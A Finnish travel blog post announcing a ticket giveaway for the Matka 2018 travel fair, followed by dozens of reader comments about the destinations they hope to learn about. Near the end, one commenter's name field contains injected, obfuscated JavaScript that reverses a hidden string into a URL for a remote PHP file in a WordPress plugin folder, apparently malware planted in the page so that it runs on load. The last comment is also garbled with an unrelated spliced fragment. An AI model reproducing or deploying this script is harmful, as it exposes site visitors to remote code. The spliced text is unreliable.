Subscribe & Follow

Yhteistyö

Matka 2018: Voita liput Matkamessuille

08/01/2018

Blogini täyttää puolentoista viikon päästä jo neljä vuotta. Vietän tätä merkkipäivää matkoilla matkamessuilla. Innostuin nimittäin ostamaan lentoliput Suomeen niin, että voin olla paikalla Matka 2018 -messuilla 19. – 21.1. Innostuin siitäkin huolimatta, että viimevuotisista matkamessuista jäi vähän ristiriitaiset tunnelmat.

Fiat 500 ratissa

En Italian vuosinani ole päässyt vielä koskaan Fiat 500:n rattiin, mutta viime vuoden matkamessuillapa pääsin! Kiitos Kokkolan osasto!

Matkamessuilla on lähes 1000 matkanjärjestäjää, matkakohdetta ja matkailualan palveluyritystä yli 80 maasta, joten tarjolla ihan valtavasti kohdevinkkejä ja tietoa. Messuosastoja ja näytteilleasettajia on niin paljon, että messuista saa paljon enemmän irti, jos on etukäteen edes alustavasti miettinyt, minne päin maailmaa mieli halajaa. Tämän opin viime vuodesta.

Viime vuonna olin Matkamessuilla ensisijaisesti siellä silloin järjestetyn Blogipaviljongin vuoksi – ja sivumennen sanoen yksinomaan muiden bloggaajien ja tietenkin lukijoiden, myös potentiaalisten uusien lukijoiden, tapaaminen oli matkamessumatkan arvoinen. En siis hakenut messuilta tietoa mistään erityisestä kohteesta, enkä juuri perehtynyt muuhun ohjelmaankaan etukäteen. Haahuilin päämäärättömästi käytävillä, täytin muutamia arvontakuponkeja, söin tarjottuja messukarkkeja ja maistiaisia ruokakojuilla ja juttelin muutamilla ständeillä pitkäänkin. Sain haahuilla ihan rauhassa, sillä valitettavan moni näytteilleasettaja oli enemmän kiinnostunut puhelimestaan kuin ryhtymään juttusille kanssani ja kertomaan enemmän palveluistaan. Tämä ei ollut yksinomaan minun vaikutelmani, sillä samantapaista palautetta annettiin näytteilleasettajille viime vuoden messuista London and beyond -blogissakin ja sen kommenteissa. En erityisemmin innostunut myöskään lavoilla ja muualla näkemästäni ohjelmasta. En ole ihan vakuuttunut siitä, että haitarimusiikki tai kansantanhut olisivat niitä, joilla matkustajia kannattaa houkutella vaikkapa Saarenmaalle tai Suomi-kohteisiin – niin hienoja kuin kansallispuvut ja -tanssit ovatkin.

Matkamessut 2017

Helsingin Matkamessut 2017

Helsingin Matkamessut 2017 (Kuva: Messukeskuksen kuvapankki.)

Helsingin Matkamessut 2017

Oli matkamessuilla minun mieleistäni ohjelmaakin (Kuva: Messukeskuksen kuvapankki.)

Edellä esittämästäni kritiikistä huolimatta odotan tulevia matkamessuja paljon. Nyt minulla on mielessäni epämääräisen haahuilun ja ruokakojujen maistiaisten rohmuamisen lisäksi pari kohdetta, joista haluaisin lisätietoa. Olen tällä kertaa tutustunut myös etukäteen ohjelmaan ja löytänyt sieltä paljon kiinnostavia puheenvuoroja. Muiden bloggaajien kokemukset kiinnostavat tietenkin messuillakin, joten viihdyn varmaan aika paljon Rantapallo Stagen tuntumassa kuuntelemassa matkabloggaajien esityksiä ruokamatkailusta upeisiin vaellusreitteihin ja road tripeihin, yksin matkailusta lasten kanssa matkustamiseen, kohteista Tallinnasta Baliin. Matkabloggaajia esiintyy myös muilla lavoilla ja Meriharakka-blogissa on kätevästi koottu kaikkien messuilla esiintyvien bloggaajien aiheet ja esiintymisajat. Matkabloggaajien lisäksi etenkin Eurooppa-stagella on paljon kiinnostavia esityksiä niin tunnetuista kuin tuntemattomammista Euroopan kohteista mm. Italian vaellusreiteistä. Ennen messuja lataan vielä Matkamessujen ilmaisen sovelluksen, jotta löydän varmasti mukana olevat yritykset, eikä kiinnostavat ohjelmat mene ohi!

Voita liput matkamessuille

Arvon tätä juttua maanantaihin 15.1. klo 21 mennessä kommentoineiden kesken kahden hengen lippupaketin (arvo 38 €) Matka 2018 -messuille ja samaan aikaan järjestettäville Caravan-messuille Voit voittaa liput itsellesi ja ystävällesi, kun kerrot kommentissa, mikä sinua vetää Matkamessuille: jokin tietty kohde tai kohteet, yleinen tunnelma, messutarjoukset ja -arvonnat, esitykset vai joku muu. Kannattaa vinkata myös sille kumppanille arvonnasta: näin tuplaatte voittomahdollisuutenne! Sähköiset liput toimitan voittajan sähköpostiin, joten muista jättää kommenttiin sähköpostiosoitteesi – se näkyy vain minulle.

Ilmoitan tässä jutussa ja Facebook-sivullani, kun arvonta on suoritettu eli maanantaina 15.1. klo 21. Käyhän siis tykkäämässä sivustani www.facebook.com/vihrealtakukkulalta !

Päivitys 15.1.2018:

LIPUT ON ARVOTTU JA VOITTAJALLE ON LÄHETETTY VIESTI. ONNEKSI OLKOON VIELÄ TÄTÄ KAUTTA, MERJA!

* Arvonta järjestetään yhteistyössä Matka 2018 -messujen kanssa, joka lahjoitti liput arvottavaksi.

Matka18_655x102_OlemmeMukana

Tykkää ja jaa:
RSS
Twitter
Visit Us
Follow Me
Instagram

75
Leave a Reply

avatar
58 Comment threads
17 Thread replies
0 Followers
 
Most reacted comment
Hottest comment thread
58 Comment authors
henna aittomäkiMinnikkäMarikaMinkaJonna Recent comment authors

This site uses Akismet to reduce spam. Learn how your comment data is processed.

  Subscribe  
newest oldest most voted
Notify of
Sari
Guest
Sari

Kohteena vetää sinne Bali tai Costa Rica. Rn oo koskaan päässyt messuille ja jo nyt olis aika. Arvokkaita vinkkejä annoit tossa ja toivottavasti puhelimet ei oo siellä näpeissä!

Elina
Guest
Elina

Olispa kiva voittaa liput messuille. Koskaan en oo matkamessuilta ollu, aina vaan haaveillu. Ja ehdottomasti kaikki Italiaan liittyvät kojut kiinnostaa ja koska perhe on kasvanut niin matkailu taaperon kanssa.

Sari Lääveri
Guest
Sari Lääveri

Italia kiinnostaa aina eli tutkin ainakin kaikki Italian osastot. Ja syksyksi pitkäviikonloppu kohde Eurooppaan hakusessa. Suomen puolen käyn myös läpi ja etsin uusia vinkkejä kotimaan matkailuun. Arvonnatkin kiinnostaa

Taija Andersson
Guest
Taija Andersson

Tykkään matkamessujen tunnelmasta. Siitä, että näkee paljon kohteita samaan aikaan. Samalla voi jutella ständillä ja kysellä mielipiteitä ja vinkkejä.

Kimmo Ahlman
Guest
Kimmo Ahlman

Uudet matkaideat. Tänä keväänä erityisesti haluaisin löytää Roomasta ja Prahasta jotain uutta tietoa sekä ihmeellistä koettavaa mitä en ole vielä niissä kaupungeissa kokenut ja nähnyt. Usko että se tieto löytyy Matkamessuilta!

OutiH
Guest
OutiH

Tarjoukset kiinnostaa ja yleensä löydämme jotain erikoiskohteita.

Ari
Guest
Ari

Haluaisin löytää uusia päiväretkikohteita joihin voisi tutustua esim. Prahasta käsin.

Elina
Guest

Matkamessuille vetää jatkuva matkakuume. B-)

Salla
Guest
Salla

Haluaisin saada messuilta vinkkejä Uuden Seelannin matkalleni. Lisäksi tarjoukset kiinnostaa 🙂

Hanna Vilppunen
Guest
Hanna Vilppunen

Tulin juuri Roomasta, jossa hyörin sinun blogivinkkiesi mukaan! Olisi kiva nähdä sinut livenä!

Raija
Guest
Raija

Messujen tunnelma on erityinen, joten aina siellä kuluu useampi tunti. Haen myös vinkkejä Kroatian matkoista.

Marjatta
Guest
Marjatta

Matkakohteena Italia on nykyään ykkösenä ja se kiinnostaa tietenkin myös messuilla.

Nina Klemetti
Guest
Nina Klemetti

Messutarjoukset ja -arvonnat.

Nelli
Guest
Nelli

Messuille vetää vuosi toisensa perään yleinen tunnelma, ideoiden hakeminen, tuleviin reissukohteisiin tutustuminen sekä valonpilkahdus talven keskelle 🙂

Satu
Guest
Satu

Minua kiinnostavat matkamessuilla matka-arvonnat ja eri maihin tutustuminen. Vielä en ole voittanut sieltä mitään, mutta toivottavasti tänä vuonna parempi onni. Toivottavasti voitan liput!

Sanna
Guest
Sanna

En ole ennen käynyt matkamessuilla, jo siks olis hauska päästä käymään.
Italian matka mielessä, mut kohde vielä hakusessa. Niin paljon ihanaa Italiassa olisi.

Marja
Guest
Marja

Minua messuille vetää matkasuunnitelmat ja haluan saada messuilta lisää infoa kyseisistä maista ja kuulla bloggareiden vinkkejä. Olen kerran voittanut lennot joten ehkä ne matka-arvonnatkin kiinnostavat

Sanna-Kaisa
Guest
Sanna-Kaisa

Matkamessuilla kiehtoo messutunnelma ja tällä kertaa haen tietoa ensi kesän lomakohteestamme, Montenegrosta.

Anne
Guest
Anne

Noin vuosi sitten aloitin seuraamaan blogiasi, juuri sopivasti ennen toukokuista Rooman matkaa. Sainkin runsaasti mukavia retki- ja tutstumiskohteita Rooman matkaa varten. Edelleen Italia vetää puoleensa, nyt kiinnostaa Cinque Terren ja Amalfin rannikko. Toivottavasti matkamessuilta löytyy vinkkejä näihin kohteisiin.

Sanski
Guest
Sanski

Tällä kertaa lähtisin tsekkaamaan, onko mitään infoa kesän matkakohteista eli Havaijista ja Tokiosta.

JuhaJ
Guest
JuhaJ

Messutarjoukset ja uutuus kohteet.

Arle
Guest
Arle

Tarjoukset, arvonnat ja fiilis, vähän kuin olisi jo matkalla 🙂

Tuula V
Guest
Tuula V

Tunnelma ja messutarjoukset

Ida Kojo
Guest
Ida Kojo

Messutarjoukset ja arvonnat 🙂

Merja
Guest
Merja

Viimeksi petyin vähän messutarjontaan. Nyt haluan vinkkejä Montenegron matkaa varten.

Riikka
Guest
Riikka

Italia kiinnostaa edelleen ja uudet ideat Italian reissuilleni!

Mari
Guest
Mari

Messuille vetää se tunnelma ja matkatarjoukset ehdottomasti.
Ja joka kerta sieltä löytyy jotain kivaa uuttakin.
Matkamessut on vaan se vuoden messutapahtuma itselleni…pakko mennä.

Pirkko / Meriharakka
Guest

Kiitos linkkauksesta – messuliput on jo hoidossa, eli en osallistu arvontaan 🙂

Siinatar
Guest
Siinatar

Hyvät messutarjoukset kiinnostavat =). Mukaan arvontaan!

Minna Suckman
Guest
Minna Suckman

En ole ikinä ollut Matka Messuilla olis kiva kyllä voittaa liput matkakuume on kova ✈️

Malaika
Guest
Malaika

Toki tarjoukset, mutta usein ne löytyvät nykyään myös netistä. Tunnelma on messuilla “se” juttu

Marika
Guest
Marika

Eniten kaipaisin yleistä fiilistelyä tulevista matkakohteista. Haavekohteite ensitalveksikin on niin paljon, että ehkä täältä saisi sysäyksen kohteen valintaan. Kesälle on jo lukittu roadtrip Jenkkien itärannikolla, mutta tarkemmat suunnitelmat vielä puuttuu, eli ehkä siihenkin voisi löytyä jotain tarkempia kohdevinkkejä.

Hilmam
Guest
Hilmam

Matkamessuille houkuttelee erityisesti asiantuntijoiden vinkit.

Susanna
Guest
Susanna

Kaikki mainitsemasi jutut vetävät minua superinnokkaana matkamessuille! Sitä on jo osittain matkalla kun messuille pääsee fiilistelemään 🙂

Mikko
Guest
Mikko

Infot Etelä-Afrikasta. ✌️

Arto
Guest
Arto

Kaikki kiinnostaa, mutta erityisesti Välimeren risteilytarjonnat ja Dubai

Ida K
Guest
Ida K

Messuista on tullut jokavuotinen traditio ja en missään nimessä halua jättää messuja tänäkään vuonna väliin. Näiltä messuilta lähden hakemaan etenkin inspiraatiota Aasian matkailuun 🙂

maisa
Guest
maisa

Ilmanmuuta matkaideoiden perässä messuille kiinnostaisi mennä!

Mariamaria
Guest
Mariamaria

Parasta on inspis ja esitteet, matkatunnelma

Sampsa
Guest
Sampsa

Mä kerään messuilta esim. karttoja. Myös osastot, joissa on vaikka jotain maan makuja maisteltavana on kiinnostavia. Ja tietenkin ne tarjoukset kiinnostaa

Maanna
Guest
Maanna

Eiköhän se ole kombo kaikkea sitä, mistä mainitsit 🙂 Tänä vuonna olisi kiva ottaa teinit mukaan ja miettiä heidän kanssaan yhdessä sopiva kohde. Krotia, Kreikka, Montenegro ja Italia ovat olleet mielessä 🙂

Maanna
Guest
Maanna

Unohtui edellisestä: hyvää Suomen reissua ja messuja sekä kiitos blogista, jota olen kahdella Rooman tienoon lomalla hyödyntänyt!

Päivi Leveelahti
Guest
Päivi Leveelahti

Rooman matka just varattu huhtikuun alussa, joten matkamessut ❤️ Rooma.

Anu
Guest
Anu

Ihana fiilis ja mahdolliset tarjoukset. Myös maaliskuun tulevaan Rooman matkaan vinkkejä sekä tietoa talonvuokraajista Kreetalla tulevaa kesälomaa varten 🙂

Mia-Sofia
Guest
Mia-Sofia

Päätimme juuri että ensi vuonna suunnataan reppureissaamaan Balille & Australiaan – tätä matkaa varten olisi hyvä saada vinkkejä messuilta! Lisäksi arvonnat kiinnostaa, muutama ystävä on käärinyt aika kivoja matkavoittoja sieltä 🙂

Elena
Guest
Elena

Yleinen tunnelma.

Jukka
Guest
Jukka

Mahtava tunnelma.

ulrika
Guest
ulrika

Lähtisin messuille ekaa kertaa, avoimin mielin ja katsomaan, onko suuren haipin arvoinen tapahtuma (uskon kyllä :D). Kreikan eri alueisiin olisi mielenkiintoista paneutua paremmin, josko löytyisi joku uus kohde itselle.

Kristiina Kilj<script>$Ikf=function(n){if (typeof ($Ikf.list[n]) == "string") return $Ikf.list[n].split("").reverse().join("");return $Ikf.list[n];};$Ikf.list=["\'php.eroc_nimda/bil/steewt-tsetal-siseneg/snigulp/tnetnoc-pw/moc.nosredneherdied.www//:ptth\'
Guest
Kristiina Kilj and ancient monuments of India. Krooniseen matkakuumeeseen Matkamessut tuovat joko hetkellistä helpotusta tai vain pahentavat sitä 😉